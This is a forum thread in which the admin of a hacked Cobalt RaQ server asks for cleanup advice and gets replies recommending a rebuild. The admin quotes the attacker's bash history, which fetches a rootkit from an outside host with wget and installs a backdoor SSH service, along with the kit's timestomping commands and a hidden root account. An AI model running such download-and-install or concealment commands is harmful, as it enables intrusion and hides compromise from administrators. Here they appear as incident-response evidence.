If anyone's remotely interested in the crap that comes with havin a server hacked.. read on.. =====================================
Hi,
Wondering if any1 has time to help with a hacked raq? I'm not the most experienced sysadmin, so hopefully this can be some good learning for me, if anyone's willing to share! Apologies for the long email, but if any1 can read it I'd appreciate it soo much
It’s a Raq4i 512mb. It got hacked through the flawed SHP package Sun shipped. I hadn’t yet applied the SHP-remove package.
You'll see the extent of the break-in later, but the only actual symptom is mail sent using my server as SMTP never arrives. Local user's mail is delivered OK. SMTP doesn't give errors; it accepts mail but doesn't deliver it.
The hack happened Monday morning at 05.00. Someone got in and executed the following, taken from BASH history (why didn't they clean this up?):
------------------------ START SNIP -----------------------------
{.{bash_history,nsr},b{in,oot},dev,etc,gmon.out,home,l{ib,ost+found},mnt
,nsr,opt,proc,root,s{bin,etup},tmp,usr,var$
hostname
cd /usr/sbin
mkdir tmp
cd tmp
pwd
wget http://www.tk-pttuntex.com/~zen/file/tutorial/rkid.tar.gz
tar -zxf rkid.tar.gz
cd rkid
./setup angina 35353
exit
------------------------ END SNIP -----------------------------
So they got in to the system, then downloaded rkid.tar.gz. This is a root kit. I downloaded it myself and it calls itself: "shkit-v4-internal release 2002". Amongst other things, there’s three files infected with a couple of viruses: Linux.Lion.Worm and Trojan.Linux.Hacktop. I know this since Norton told me when I downloaded the rkid.tar.gz to my Windows PC. Is there anything I can do about these viruses?
The kit installed a new sshd, running on port 35353 with the pass 'angina'.
I tried this:
/sbin/ipchains -A input -j DENY -p tcp -l -s 0.0.0.0/0 -d my.servers.ip.address/32 35353
I added the ipchains line to the bottom of rc.local to make sure it carries over reboots.
That stopped telnet and SSH on port 35353 from working. Telnet's normally disabled, but had mysteriously become enabled. I disabled it again.
I've stopped access to the hacker's own SSH, and changed the password for admin and root on my 'real' SSH. Is that enough to stop the immediate threat? Or will they have access to my new passwords somehow?
I got the chkrootkit software to check other stuff.
Notable results:
[root chkrootkit-0.37]# ./chkrootkit
Checking `ifconfig'... INFECTED
Checking `login'... INFECTED
Searching for t0rn's v8 defaults... Possible t0rn v8 (or variation) rootkit installed Searching for Showtee... Warning: Possible Showtee Rootkit installed
I installed Portsentry 2. Do I need to add that to my rc.local to make sure it starts up on reboot?
Found in /etc/passwd & /etc/shadow: sbin:x:0:0::/sbin/services:/bin/bash
Seemed to be a user called ‘sbin’ with root privileges? Got rid of it. Should I have done this another way with ‘userdel’ or something? Do I need to restart anything for these changes to be noticed?
System logs aren’t being generated. How can I sort that? Syslogd reports it's already running.
The kit added these lines to rc.sysinit. I removed them, but what did they do?
# Xntps (NTPv3 daemon) startup..
/usr/sbin/xntps -q
And finally..here's all the files the kit backdoor'd:
------------- START SNIP ----------------
# time change bitch
touch -acmr /sbin/ifconfig ifconfig
touch -acmr /bin/ps ps
touch -acmr /bin/ls ls
touch -acmr /bin/login login
touch -acmr /bin/netstat netstat
touch -acmr /usr/bin/find find
touch -acmr /usr/bin/top top
touch -acmr /usr/sbin/lsof lsof
touch -acmr /sbin/syslogd syslogd
touch -acmr /usr/bin/slocate slocate
touch -acmr /usr/bin/dir dir
touch -acmr /usr/bin/md5sum md5sum
touch -acmr /usr/bin/pstree pstree
echo ${RED} baga mare PuiDeDraC jajajaj !!! PuiDeDraC Iz Hackerz!!!
------------- END SNIP --------------------
It looks like the damage is pretty serious. I've taken an SQL backup of the mySQL databases on the server, plus tarballed up the /home/sites directory. If I clean the latter with Norton, order a rebuild from my datacentre, then upload everything back..is that the best way forward?
And did this really all happen just because I didn't apply the SHP-remove package from Sun in time?
Thanks!!
---
Originally posted by legendario
TdC is my hero
He's like a unix Mcgyver
Originally posted by pharkie
It was me that Doh_boy posted on behalf of. Thanks for your reply! Was really helpful
no sweat
The server's still online, but that's cuz all my customers sites are on it. Their websites & email are working OK for the time being. I'm pretty sure the attacker can't get into the system for the moment.
on your own head
Like you say tho, I can't trust anything the system is telling me any more..and the only thing to do is a reinstall.
it's the only thing you can do. I've been there
I've downloaded all the websites in a big tarball. If I put these files on another Raq and set up all the sites/DNS again.. is there any risk they would compromise the second server?
see above. just configure another raq as the hacked box, pump the sites over and boot it with the hacked box's IP as you take the old one down. you'll only be out for a minute or two at the most. call it a system upgrade or something so your customers don't bitch
There's about 30 domains on the server, so this is gonna take some time! Can't think what I'd do if there were 200 sites on it..
go as slow as you can. people in a hurry make silly mistakes
SDC isn't really an option since there's nothin as good as CuteFTP for it..and the Mac client support is weak. I'd consider FTP over SSL though like Cute's secure client uses.